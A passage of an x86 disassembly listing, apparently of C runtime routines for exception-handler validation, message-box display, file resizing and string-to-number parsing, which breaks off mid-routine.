mov ebp, esp
sub esp, 20h
push ebx
push esi
mov esi, [ebp+arg_0]
mov ebx, [esi+8]
test bl, 3
jnz short loc_428515
mov eax, large fs:18h
mov [ebp+arg_0], eax
mov eax, [ebp+arg_0]
mov ecx, [eax+8]
cmp ebx, ecx
mov [ebp+var_4], ecx
jb short loc_42851C
cmp ebx, [eax+4]
jnb short loc_42851C
loc_428515: ; CODE XREF: sub_4284E7+11�j
xor eax, eax
jmp loc_42870C
; ---------------------------------------------------------------------------
loc_42851C: ; CODE XREF: sub_4284E7+27�j
; sub_4284E7+2C�j
push edi
mov edi, [esi+0Ch]
cmp edi, 0FFFFFFFFh
jnz short loc_42852D
loc_428525: ; CODE XREF: sub_4284E7+139�j
; sub_4284E7+19C�j ...
xor eax, eax
inc eax
jmp loc_42870B
; ---------------------------------------------------------------------------
loc_42852D: ; CODE XREF: sub_4284E7+3C�j
xor edx, edx
mov [ebp+arg_0], edx
mov eax, ebx
loc_428534: ; CODE XREF: sub_4284E7+6B�j
mov ecx, [eax]
cmp ecx, 0FFFFFFFFh
jz short loc_428543
cmp ecx, edx
jnb loc_428688
loc_428543: ; CODE XREF: sub_4284E7+52�j
cmp dword ptr [eax+4], 0
jz short loc_42854C
inc [ebp+arg_0]
loc_42854C: ; CODE XREF: sub_4284E7+60�j
inc edx
add eax, 0Ch
cmp edx, edi
jbe short loc_428534
cmp [ebp+arg_0], 0
jz short loc_42856E
mov eax, [esi-8]
cmp eax, [ebp+var_4]
jb loc_428688
cmp eax, esi
jnb loc_428688
loc_42856E: ; CODE XREF: sub_4284E7+71�j
mov eax, ds:dword_4E2B10
mov edi, ebx
and edi, 0FFFFF000h
xor esi, esi
test eax, eax
jle short loc_428593
loc_428581: ; CODE XREF: sub_4284E7+AA�j
cmp ds:dword_4E2B18[esi*4], edi
jz loc_42868C
inc esi
cmp esi, eax
jl short loc_428581
loc_428593: ; CODE XREF: sub_4284E7+98�j
push 1Ch
lea eax, [ebp+var_20]
push eax
push ebx
call ds:dword_42B178 ; VirtualQuery
test eax, eax
jz loc_428708
cmp [ebp+var_8], 1000000h
jnz loc_428708
test [ebp+var_C], 0CCh
jz short loc_428611
mov ecx, [ebp+var_1C]
cmp word ptr [ecx], 5A4Dh
jnz loc_428708
mov eax, [ecx+3Ch]
add eax, ecx
cmp dword ptr [eax], 4550h
jnz loc_428708
cmp word ptr [eax+18h], 10Bh
jnz loc_428708
sub ebx, ecx
cmp word ptr [eax+6], 0
movzx ecx, word ptr [eax+14h]
lea ecx, [ecx+eax+18h]
jbe loc_428708
mov eax, [ecx+0Ch]
cmp ebx, eax
jb short loc_428611
mov edx, [ecx+8]
add edx, eax
cmp ebx, edx
jnb short loc_428611
test byte ptr [ecx+27h], 80h
jnz short loc_428688
loc_428611: ; CODE XREF: sub_4284E7+D2�j
; sub_4284E7+119�j ...
push 1
push offset dword_4E2B58
call ds:dword_42B138 ; InterlockedExchange
test eax, eax
jnz loc_428525
mov ecx, ds:dword_4E2B10
test ecx, ecx
mov edx, ecx
jle short loc_428645
lea eax, ds:4E2B14h[ecx*4]
loc_428639: ; CODE XREF: sub_4284E7+15C�j
cmp [eax], edi
jz short loc_428645
dec edx
sub eax, 4
test edx, edx
jg short loc_428639
loc_428645: ; CODE XREF: sub_4284E7+149�j
; sub_4284E7+154�j
test edx, edx
jnz short loc_428676
push 0Fh
pop ebx
cmp ecx, ebx
jg short loc_428652
mov ebx, ecx
loc_428652: ; CODE XREF: sub_4284E7+167�j
xor edx, edx
test ebx, ebx
jl short loc_42866A
loc_428658: ; CODE XREF: sub_4284E7+181�j
lea eax, ds:4E2B18h[edx*4]
mov esi, [eax]
inc edx
cmp edx, ebx
mov [eax], edi
mov edi, esi
jle short loc_428658
loc_42866A: ; CODE XREF: sub_4284E7+16F�j
cmp ecx, 10h
jge short loc_428676
inc ecx
mov ds:dword_4E2B10, ecx
loc_428676: ; CODE XREF: sub_4284E7+160�j
; sub_4284E7+186�j
push 0
push offset dword_4E2B58
call ds:dword_42B138 ; InterlockedExchange
jmp loc_428525
; ---------------------------------------------------------------------------
loc_428688: ; CODE XREF: sub_4284E7+56�j
; sub_4284E7+79�j ...
xor eax, eax
jmp short loc_42870B
; ---------------------------------------------------------------------------
loc_42868C: ; CODE XREF: sub_4284E7+A1�j
test esi, esi
jle loc_428525
mov ebx, ds:dword_42B138
push 1
push offset dword_4E2B58
call ebx ; InterlockedExchange
test eax, eax
jnz loc_428525
cmp ds:dword_4E2B18[esi*4], edi
jz short loc_4286E2
mov eax, ds:dword_4E2B10
lea esi, [eax-1]
test esi, esi
jl short loc_4286D0
loc_4286C0: ; CODE XREF: sub_4284E7+1E3�j
cmp ds:dword_4E2B18[esi*4], edi
jz short loc_4286CC
dec esi
jns short loc_4286C0
loc_4286CC: ; CODE XREF: sub_4284E7+1E0�j
test esi, esi
jge short loc_4286E0
loc_4286D0: ; CODE XREF: sub_4284E7+1D7�j
cmp eax, 10h
jge short loc_4286DB
inc eax
mov ds:dword_4E2B10, eax
loc_4286DB: ; CODE XREF: sub_4284E7+1EC�j
lea esi, [eax-1]
jmp short loc_4286E2
; ---------------------------------------------------------------------------
loc_4286E0: ; CODE XREF: sub_4284E7+1E7�j
jz short loc_4286FA
loc_4286E2: ; CODE XREF: sub_4284E7+1CB�j
; sub_4284E7+1F7�j
xor ecx, ecx
test esi, esi
jl short loc_4286FA
loc_4286E8: ; CODE XREF: sub_4284E7+211�j
lea eax, ds:4E2B18h[ecx*4]
mov edx, [eax]
inc ecx
cmp ecx, esi
mov [eax], edi
mov edi, edx
jle short loc_4286E8
loc_4286FA: ; CODE XREF: sub_4284E7:loc_4286E0�j
; sub_4284E7+1FF�j
push 0
push offset dword_4E2B58
call ebx ; InterlockedExchange
jmp loc_428525
; ---------------------------------------------------------------------------
loc_428708: ; CODE XREF: sub_4284E7+BB�j
; sub_4284E7+C8�j ...
or eax, 0FFFFFFFFh
loc_42870B: ; CODE XREF: sub_4284E7+41�j
; sub_4284E7+1A3�j
pop edi
loc_42870C: ; CODE XREF: sub_4284E7+30�j
pop esi
pop ebx
leave
retn
sub_4284E7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428710 proc near ; CODE XREF: sub_426069+129�p
; sub_426FC0+138�p
var_10 = byte ptr -10h
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_A = byte ptr 12h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
xor ebx, ebx
cmp ds:dword_4E2B5C, ebx
push esi
push edi
jnz short loc_428790
push offset aUser32_dll ; "user32.dll"
call ds:dword_42B018 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_4287CB
mov esi, ds:dword_42B020
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi ; GetProcAddress
test eax, eax
mov ds:dword_4E2B5C, eax
jz short loc_4287CB
push offset aGetactivewindo ; "GetActiveWindow"
push edi
call esi ; GetProcAddress
push offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov ds:dword_4E2B60, eax
call esi ; GetProcAddress
cmp ds:dword_4E2900, 2
mov ds:dword_4E2B64, eax
jnz short loc_428790
push offset aGetuserobjecti ; "GetUserObjectInformationA"
push edi
call esi ; GetProcAddress
test eax, eax
mov ds:dword_4E2B6C, eax
jz short loc_428790
push offset aGetprocesswind ; "GetProcessWindowStation"
push edi
call esi ; GetProcAddress
mov ds:dword_4E2B68, eax
loc_428790: ; CODE XREF: sub_428710+11�j
; sub_428710+60�j ...
mov eax, ds:dword_4E2B68
test eax, eax
jz short loc_4287D5
call eax
test eax, eax
jz short loc_4287BC
lea ecx, [ebp+var_4]
push ecx
push 0Ch
lea ecx, [ebp+var_10]
push ecx
push 1
push eax
call ds:dword_4E2B6C
test eax, eax
jz short loc_4287BC
test [ebp+var_8], 1
jnz short loc_4287D5
loc_4287BC: ; CODE XREF: sub_428710+8D�j
; sub_428710+A4�j
cmp ds:dword_4E290C, 4
jb short loc_4287CF
or [ebp+arg_A], 20h
jmp short loc_4287F4
; ---------------------------------------------------------------------------
loc_4287CB: ; CODE XREF: sub_428710+22�j
; sub_428710+3D�j
xor eax, eax
jmp short loc_428804
; ---------------------------------------------------------------------------
loc_4287CF: ; CODE XREF: sub_428710+B3�j
or [ebp+arg_A], 4
jmp short loc_4287F4
; ---------------------------------------------------------------------------
loc_4287D5: ; CODE XREF: sub_428710+87�j
; sub_428710+AA�j
mov eax, ds:dword_4E2B60
test eax, eax
jz short loc_4287F4
call eax
mov ebx, eax
test ebx, ebx
jz short loc_4287F4
mov eax, ds:dword_4E2B64
test eax, eax
jz short loc_4287F4
push ebx
call eax
mov ebx, eax
loc_4287F4: ; CODE XREF: sub_428710+B9�j
; sub_428710+C3�j ...
push dword ptr [ebp+10h]
push [ebp+arg_4]
push [ebp+arg_0]
push ebx
call ds:dword_4E2B5C
loc_428804: ; CODE XREF: sub_428710+BD�j
pop edi
pop esi
pop ebx
leave
retn
sub_428710 endp
; =============== S U B R O U T I N E =======================================
sub_428809 proc near ; CODE XREF: sub_42883C+8�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
movzx eax, [esp+arg_0]
mov cl, [esp+arg_8]
test ds:byte_4E2CC1[eax], cl
jnz short loc_428838
cmp [esp+arg_4], 0
jz short loc_428831
mov ecx, ds:off_4437D8
movzx eax, word ptr [ecx+eax*2]
and eax, [esp+arg_4]
jmp short loc_428833
; ---------------------------------------------------------------------------
loc_428831: ; CODE XREF: sub_428809+16�j
xor eax, eax
loc_428833: ; CODE XREF: sub_428809+26�j
test eax, eax
jnz short loc_428838
retn
; ---------------------------------------------------------------------------
loc_428838: ; CODE XREF: sub_428809+F�j
; sub_428809+2C�j
xor eax, eax
inc eax
retn
sub_428809 endp
; =============== S U B R O U T I N E =======================================
sub_42883C proc near ; CODE XREF: sub_42638A+3F�p
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
call sub_428809
add esp, 0Ch
retn
sub_42883C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42884D proc near ; CODE XREF: sub_426A43+2A6�p
var_1008 = dword ptr -1008h
var_1004 = byte ptr -1004h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1008h
call sub_41EA20
mov eax, ds:dword_4437D4
push ebx
mov ebx, [ebp+arg_0]
push esi
xor esi, esi
cmp ebx, ds:dword_4E2B98
mov [ebp+var_4], eax
jnb loc_428990
mov eax, ebx
sar eax, 5
mov eax, ds:dword_4E2BA0[eax*4]
mov ecx, ebx
and ecx, 1Fh
test byte ptr [eax+ecx*8+4], 1
jz loc_428990
push 1
push esi
push ebx
call sub_42569D
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebp+var_1008], eax
jz loc_42899A
push 2
push esi
push ebx
call sub_42569D
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_42899A
push edi
mov edi, [ebp+arg_4]
sub edi, eax
test edi, edi
jle short loc_42893A
push 1000h
lea eax, [ebp+var_1004]
push esi
push eax
call sub_41E5F0
push 8000h
push ebx
call sub_4293D8
add esp, 14h
mov [ebp+arg_0], eax
loc_4288EE: ; CODE XREF: sub_42884D+C6�j
mov eax, 1000h
cmp edi, eax
jge short loc_4288F9
mov eax, edi
loc_4288F9: ; CODE XREF: sub_42884D+A8�j
push eax
lea eax, [ebp+var_1004]
push eax
push ebx
call sub_425882
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_428917
sub edi, eax
test edi, edi
jg short loc_4288EE
jmp short loc_42892D
; ---------------------------------------------------------------------------
loc_428917: ; CODE XREF: sub_42884D+C0�j
cmp ds:dword_4E28F8, 5
jnz short loc_42892A
mov ds:dword_4E28F4, 0Dh
loc_42892A: ; CODE XREF: sub_42884D+D1�j
or esi, 0FFFFFFFFh
loc_42892D: ; CODE XREF: sub_42884D+C8�j
push [ebp+arg_0]
push ebx
call sub_4293D8
pop ecx
pop ecx
jmp short loc_42897A
; ---------------------------------------------------------------------------
loc_42893A: ; CODE XREF: sub_42884D+7C�j
jge short loc_42897A
push 0
push [ebp+arg_4]
push ebx
call sub_42569D
push ebx
call sub_42696C
add esp, 10h
push eax
call ds:dword_42B1C8 ; SetEndOfFile
mov esi, eax
neg esi
sbb esi, esi
neg esi
dec esi
cmp esi, 0FFFFFFFFh
jnz short loc_42897A
mov ds:dword_4E28F4, 0Dh
call ds:dword_42B01C ; RtlGetLastWin32Error
mov ds:dword_4E28F8, eax
loc_42897A: ; CODE XREF: sub_42884D+EB�j
; sub_42884D:loc_42893A�j ...
push 0
push [ebp+var_1008]
push ebx
call sub_42569D
add esp, 0Ch
mov eax, esi
pop edi
jmp short loc_42899D
; ---------------------------------------------------------------------------
loc_428990: ; CODE XREF: sub_42884D+22�j
; sub_42884D+3E�j
mov ds:dword_4E28F4, 9
loc_42899A: ; CODE XREF: sub_42884D+59�j
; sub_42884D+6E�j
or eax, 0FFFFFFFFh
loc_42899D: ; CODE XREF: sub_42884D+141�j
mov ecx, [ebp+var_4]
pop esi
pop ebx
call sub_422B83
leave
retn
sub_42884D endp
; =============== S U B R O U T I N E =======================================
sub_4289A9 proc near ; CODE XREF: sub_427B52+23�p
; sub_427B52+3A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_0]
push esi
mov esi, [esp+4+arg_4]
lea ecx, [edx+esi]
xor eax, eax
cmp ecx, edx
jb short loc_4289BF
cmp ecx, esi
jnb short loc_4289C2
loc_4289BF: ; CODE XREF: sub_4289A9+10�j
xor eax, eax
inc eax
loc_4289C2: ; CODE XREF: sub_4289A9+14�j
mov edx, [esp+4+arg_8]
mov [edx], ecx
pop esi
retn
sub_4289A9 endp
; =============== S U B R O U T I N E =======================================
sub_4289CA proc near ; CODE XREF: sub_428A83+48�p
; sub_428A83+69�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
mov edi, [esp+8+arg_4]
push esi
push dword ptr [edi]
push dword ptr [esi]
call sub_4289A9
add esp, 0Ch
test eax, eax
jz short loc_4289FC
lea eax, [esi+4]
push eax
push 1
push dword ptr [eax]
call sub_4289A9
add esp, 0Ch
test eax, eax
jz short loc_4289FC
inc dword ptr [esi+8]
loc_4289FC: ; CODE XREF: sub_4289CA+19�j
; sub_4289CA+2D�j
lea eax, [esi+4]
push eax
push dword ptr [edi+4]
push dword ptr [eax]
call sub_4289A9
add esp, 0Ch
test eax, eax
jz short loc_428A14
inc dword ptr [esi+8]
loc_428A14: ; CODE XREF: sub_4289CA+45�j
lea eax, [esi+8]
push eax
push dword ptr [edi+8]
push dword ptr [eax]
call sub_4289A9
add esp, 0Ch
pop edi
pop esi
retn
sub_4289CA endp
; =============== S U B R O U T I N E =======================================
sub_428A28 proc near ; CODE XREF: sub_428A83+38�p
; sub_428A83+3E�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
mov esi, [eax]
mov ecx, esi
add esi, esi
push edi
mov edi, [eax+4]
shr ecx, 1Fh
mov [eax], esi
lea esi, [edi+edi]
or esi, ecx
mov ecx, [eax+8]
mov edx, edi
shr edx, 1Fh
shl ecx, 1
or ecx, edx
pop edi
mov [eax+4], esi
mov [eax+8], ecx
pop esi
retn
sub_428A28 endp
; =============== S U B R O U T I N E =======================================
sub_428A56 proc near ; CODE XREF: sub_428FE8+1BE�p
; sub_42945A+187�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov edx, [eax+8]
mov ecx, [eax+4]
push esi
push edi
mov edi, ecx
mov esi, edx
shr ecx, 1
shl esi, 1Fh
or ecx, esi
mov [eax+4], ecx
mov ecx, [eax]
shl edi, 1Fh
shr ecx, 1
or ecx, edi
shr edx, 1
pop edi
mov [eax+8], edx
mov [eax], ecx
pop esi
retn
sub_428A56 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428A83 proc near ; CODE XREF: sub_428B61+3B2�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, ds:dword_4437D4
push ebx
mov ebx, [ebp+arg_8]
xor edx, edx
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
cmp eax, edx
push esi
push edi
mov [ebp+var_14], 404Eh
mov [ebx], edx
mov [ebx+4], edx
mov [ebx+8], edx
jbe short loc_428AFE
mov [ebp+arg_8], eax
loc_428AB2: ; CODE XREF: sub_428A83+77�j
mov esi, ebx
lea edi, [ebp+var_10]
movsd
movsd
push ebx
movsd
call sub_428A28
push ebx
call sub_428A28
lea eax, [ebp+var_10]
push eax
push ebx
call sub_4289CA
push ebx
call sub_428A28
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
and [ebp+var_C], 0
and [ebp+var_8], 0
mov [ebp+var_10], eax
lea eax, [ebp+var_10]
push eax
push ebx
call sub_4289CA
add esp, 1Ch
inc [ebp+arg_0]
dec [ebp+arg_8]
jnz short loc_428AB2
xor edx, edx
loc_428AFE: ; CODE XREF: sub_428A83+2A�j
cmp [ebx+8], edx
jnz short loc_428B32
mov edi, [ebx+8]
loc_428B06: ; CODE XREF: sub_428A83+AA�j
mov ecx, [ebx+4]
add [ebp+var_14], 0FFF0h
mov eax, ecx
shr eax, 10h
mov edi, eax
mov eax, [ebx]
mov esi, eax
shr esi, 10h
shl ecx, 10h
or esi, ecx
shl eax, 10h
cmp edi, edx
mov [ebx+4], esi
mov [ebx], eax
jz short loc_428B06
mov [ebx+8], edi
loc_428B32: ; CODE XREF: sub_428A83+7E�j
mov esi, 8000h
jmp short loc_428B47
; ---------------------------------------------------------------------------
loc_428B39: ; CODE XREF: sub_428A83+C7�j
push ebx
call sub_428A28
add [ebp+var_14], 0FFFFh
pop ecx
loc_428B47: ; CODE XREF: sub_428A83+B4�j
test [ebx+8], esi
jz short loc_428B39
mov ax, word ptr [ebp+var_14]
mov ecx, [ebp+var_4]
pop edi
pop esi
mov [ebx+0Ah], ax
pop ebx
call sub_422B83
leave
retn
sub_428A83 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428B61 proc near ; CODE XREF: sub_427E44+1F�p
; sub_427E81+1F�p
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_19 = byte ptr -19h
var_14 = dword ptr -14h
var_E = dword ptr -0Eh
var_A = dword ptr -0Ah
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 5Ch
mov eax, ds:dword_4437D4
mov [ebp+var_4], eax
push ebx
lea eax, [ebp+var_30]
push esi
mov [ebp+var_3C], eax
xor eax, eax
xor edx, edx
push edi
mov edi, [ebp+arg_8]
inc edx
mov [ebp+var_50], eax
mov [ebp+var_4C], edx
mov [ebp+var_34], eax
mov [ebp+var_44], eax
mov [ebp+var_58], eax
mov [ebp+var_5C], eax
mov [ebp+var_54], eax
mov [ebp+var_38], eax
mov [ebp+var_48], eax
mov [ebp+var_40], edi
loc_428B9E: ; CODE XREF: sub_428B61+54�j
mov cl, [edi]
cmp cl, 20h
jz short loc_428BB4
cmp cl, 9
jz short loc_428BB4
cmp cl, 0Ah
jz short loc_428BB4
cmp cl, 0Dh
jnz short loc_428BB7
loc_428BB4: ; CODE XREF: sub_428B61+42�j
; sub_428B61+47�j ...
inc edi
jmp short loc_428B9E
; ---------------------------------------------------------------------------
loc_428BB7: ; CODE XREF: sub_428B61+51�j
push 4
pop esi
loc_428BBA: ; CODE XREF: sub_428B61+B1�j
; sub_428B61+BA�j ...
mov bl, [edi]
inc edi
cmp eax, 0Bh ; switch 12 cases
ja loc_428E2E ; default
; jumptable 00428BC6 case 10
jmp off_428FB8[eax*4] ; switch jump
loc_428BCD: ; DATA XREF: seg000:off_428FB8�o
cmp bl, 31h ; jumptable 00428BC6 case 0
jl short loc_428BDE
cmp bl, 39h
jg short loc_428BDE
loc_428BD7: ; CODE XREF: sub_428B61+C7�j
; sub_428B61+10F�j
push 3
jmp loc_428DE6
; ---------------------------------------------------------------------------
loc_428BDE: ; CODE XREF: sub_428B61+6F�j
; sub_428B61+74�j
cmp bl, ds:byte_4437B4
jnz short loc_428BED
loc_428BE6: ; CODE XREF: sub_428B61+11B�j
push 5
jmp loc_428E24
; ---------------------------------------------------------------------------
loc_428BED: ; CODE XREF: sub_428B61+83�j
movsx eax, bl
sub eax, 2Bh
jz short loc_428C14
dec eax
dec eax
jz short loc_428C08
sub eax, 3
jz loc_428C8B
loc_428C02: ; CODE XREF: sub_428B61+E7�j
; sub_428B61+F1�j ...
dec edi
jmp loc_428EC1
; ---------------------------------------------------------------------------
loc_428C08: ; CODE XREF: sub_428B61+96�j
push 2
pop eax
mov [ebp+var_50], 8000h
jmp short loc_428BBA
; ---------------------------------------------------------------------------
loc_428C14: ; CODE XREF: sub_428B61+92�j
and [ebp+var_50], 0
push 2
pop eax
jmp short loc_428BBA
; ---------------------------------------------------------------------------
loc_428C1D: ; CODE XREF: sub_428B61+65�j
; DATA XREF: seg000:off_428FB8�o
cmp bl, 31h ; jumptable 00428BC6 case 1
mov [ebp+var_44], edx
jl short loc_428C2A
cmp bl, 39h
jle short loc_428BD7
loc_428C2A: ; CODE XREF: sub_428B61+C2�j
cmp bl, ds:byte_4437B4
jz loc_428CE4
cmp bl, 2Bh
jz short loc_428C60
cmp bl, 2Dh
jz short loc_428C60
cmp bl, 30h
jz short loc_428C8B
loc_428C45: ; CODE XREF: sub_428B61+1FA�j
cmp bl, 43h
jle short loc_428C02
cmp bl, 45h
jle short loc_428C59
cmp bl, 63h
jle short loc_428C02
cmp bl, 65h
jg short loc_428C02
loc_428C59: ; CODE XREF: sub_428B61+EC�j
push 6
jmp loc_428E24
; ---------------------------------------------------------------------------
loc_428C60: ; CODE XREF: sub_428B61+D8�j
; sub_428B61+DD�j ...
dec edi
push 0Bh
jmp loc_428E24
; ---------------------------------------------------------------------------
loc_428C68: ; CODE XREF: sub_428B61+65�j
; DATA XREF: seg000:off_428FB8�o
cmp bl, 31h ; jumptable 00428BC6 case 2
jl short loc_428C76
cmp bl, 39h
jle loc_428BD7
loc_428C76: ; CODE XREF: sub_428B61+10A�j
cmp bl, ds:byte_4437B4
jz loc_428BE6
cmp bl, 30h
jnz loc_428DF2
loc_428C8B: ; CODE XREF: sub_428B61+9B�j
; sub_428B61+E2�j
mov eax, edx
jmp loc_428BBA
; ---------------------------------------------------------------------------
loc_428C92: ; CODE XREF: sub_428B61+65�j
; DATA XREF: seg000:off_428FB8�o
mov [ebp+var_44], edx ; jumptable 00428BC6 case 3
loc_428C95: ; CODE XREF: sub_428B61+179�j
cmp ds:dword_4437B0, edx
movzx eax, bl
jle short loc_428CAE
push esi
push eax
call sub_422B91
pop ecx
xor edx, edx
pop ecx
inc edx
jmp short loc_428CBA
; ---------------------------------------------------------------------------
loc_428CAE: ; CODE XREF: sub_428B61+13D�j
mov ecx, ds:off_4437D8
movzx eax, byte ptr [ecx+eax*2]
and eax, esi
loc_428CBA: ; CODE XREF: sub_428B61+14B�j
test eax, eax
jz short loc_428CDC
cmp [ebp+var_34], 19h
jnb short loc_428CD4
mov eax, [ebp+var_3C]
inc [ebp+var_34]
sub bl, 30h
inc [ebp+var_3C]
mov [eax], bl
jmp short loc_428CD7
; ---------------------------------------------------------------------------
loc_428CD4: ; CODE XREF: sub_428B61+161�j
inc [ebp+var_38]
loc_428CD7: ; CODE XREF: sub_428B61+171�j
mov bl, [edi]
inc edi
jmp short loc_428C95
; ---------------------------------------------------------------------------
loc_428CDC: ; CODE XREF: sub_428B61+15B�j
cmp bl, ds:byte_4437B4
jnz short loc_428D49
loc_428CE4: ; CODE XREF: sub_428B61+CF�j
mov eax, esi
jmp loc_428BBA
; ---------------------------------------------------------------------------
loc_428CEB: ; CODE XREF: sub_428B61+65�j
; DATA XREF: seg000:off_428FB8�o
cmp [ebp+var_34], 0 ; jumptable 00428BC6 case 4
mov [ebp+var_44], edx
mov [ebp+var_58], edx
jnz short loc_428D04
jmp short loc_428CFF
; ---------------------------------------------------------------------------
loc_428CF9: ; CODE XREF: sub_428B61+1A1�j
dec [ebp+var_38]
mov bl, [edi]
inc edi
loc_428CFF: ; CODE XREF: sub_428B61+196�j
cmp bl, 30h
jz short loc_428CF9
loc_428D04: ; CODE XREF: sub_428B61+194�j
; sub_428B61+1E6�j
cmp ds:dword_4437B0, edx
movzx eax, bl
jle short loc_428D1D
push esi
push eax
call sub_422B91
pop ecx
xor edx, edx
pop ecx
inc edx
jmp short loc_428D29
; ---------------------------------------------------------------------------
loc_428D1D: ; CODE XREF: sub_428B61+1AC�j
mov ecx, ds:off_4437D8
movzx eax, byte ptr [ecx+eax*2]
and eax, esi
loc_428D29: ; CODE XREF: sub_428B61+1BA�j
test eax, eax
jz short loc_428D49
cmp [ebp+var_34], 19h
jnb short loc_428D44
inc [ebp+var_34]
mov eax, [ebp+var_3C]
sub bl, 30h
inc [ebp+var_3C]
dec [ebp+var_38]
mov [eax], bl
loc_428D44: ; CODE XREF: sub_428B61+1D0�j
mov bl, [edi]
inc edi
jmp short loc_428D04
; ---------------------------------------------------------------------------
loc_428D49: ; CODE XREF: sub_428B61+181�j
; sub_428B61+1CA�j
cmp bl, 2Bh
jz loc_428C60
cmp bl, 2Dh
jz loc_428C60
jmp loc_428C45
; ---------------------------------------------------------------------------
loc_428D60: ; CODE XREF: sub_428B61+65�j
; DATA XREF: seg000:off_428FB8�o
cmp ds:dword_4437B0, edx ; jumptable 00428BC6 case 5
mov [ebp+var_58], edx
movzx eax, bl
jle short loc_428D7C
push esi
push eax
call sub_422B91
pop ecx
xor edx, edx
pop ecx
inc edx
jmp short loc_428D88
; ---------------------------------------------------------------------------
loc_428D7C: ; CODE XREF: sub_428B61+20B�j
mov ecx, ds:off_4437D8
movzx eax, byte ptr [ecx+eax*2]
and eax, esi
loc_428D88: ; CODE XREF: sub_428B61+219�j
test eax, eax
jz short loc_428DF2
mov eax, esi
jmp short loc_428DE7
; ---------------------------------------------------------------------------
loc_428D90: ; CODE XREF: sub_428B61+65�j
; DATA XREF: seg000:off_428FB8�o
cmp bl, 31h ; jumptable 00428BC6 case 6
lea ecx, [edi-2]
mov [ebp+var_40], ecx
jl short loc_428DA0
cmp bl, 39h
jle short loc_428DE4
loc_428DA0: ; CODE XREF: sub_428B61+238�j
movsx eax, bl
sub eax, 2Bh
jz short loc_428E22
dec eax
dec eax
jz short loc_428E16
sub eax, 3
jnz loc_428EBF
loc_428DB5: ; CODE XREF: sub_428B61+28F�j
push 8
jmp short loc_428E24
; ---------------------------------------------------------------------------
loc_428DB9: ; CODE XREF: sub_428B61+65�j
; DATA XREF: seg000:off_428FB8�o
mov [ebp+var_5C], edx ; jumptable 00428BC6 case 8
jmp short loc_428DC1
; ---------------------------------------------------------------------------
loc_428DBE: ; CODE XREF: sub_428B61+263�j
mov bl, [edi]
inc edi
loc_428DC1: ; CODE XREF: sub_428B61+25B�j
cmp bl, 30h
jz short loc_428DBE
cmp bl, 31h
jl loc_428C02
cmp bl, 39h
jg loc_428C02
jmp short loc_428DE4
; ---------------------------------------------------------------------------
loc_428DDA: ; CODE XREF: sub_428B61+65�j
; DATA XREF: seg000:off_428FB8�o
cmp bl, 31h ; jumptable 00428BC6 case 7
jl short loc_428DED
cmp bl, 39h
jg short loc_428DED
loc_428DE4: ; CODE XREF: sub_428B61+23D�j
; sub_428B61+277�j
push 9
loc_428DE6: ; CODE XREF: sub_428B61+78�j
pop eax
loc_428DE7: ; CODE XREF: sub_428B61+22D�j
dec edi
jmp loc_428BBA
; ---------------------------------------------------------------------------
loc_428DED: ; CODE XREF: sub_428B61+27C�j
; sub_428B61+281�j
cmp bl, 30h
jz short loc_428DB5
loc_428DF2: ; CODE XREF: sub_428B61+124�j
; sub_428B61+229�j
mov edi, [ebp+var_40]
jmp loc_428EC1
; ---------------------------------------------------------------------------
loc_428DFA: ; CODE XREF: sub_428B61+65�j
; DATA XREF: seg000:off_428FB8�o
cmp [ebp+arg_18], 0 ; jumptable 00428BC6 case 11
jz short loc_428E2A
movsx eax, bl
sub eax, 2Bh
lea ecx, [edi-1]
mov [ebp+var_40], ecx
jz short loc_428E22
dec eax
dec eax
jnz loc_428EBF
loc_428E16: ; CODE XREF: sub_428B61+249�j
or [ebp+var_4C], 0FFFFFFFFh
push 7
pop eax
jmp loc_428BBA
; ---------------------------------------------------------------------------
loc_428E22: ; CODE XREF: sub_428B61+245�j
; sub_428B61+2AB�j
push 7
loc_428E24: ; CODE XREF: sub_428B61+87�j
; sub_428B61+FA�j ...
pop eax
jmp loc_428BBA
; ---------------------------------------------------------------------------
loc_428E2A: ; CODE XREF: sub_428B61+29D�j
push 0Ah
pop eax
dec edi
loc_428E2E: ; CODE XREF: sub_428B61+5F�j
; sub_428B61+65�j
; DATA XREF: ...
cmp eax, 0Ah ; default
; jumptable 00428BC6 case 10
jnz loc_428BBA
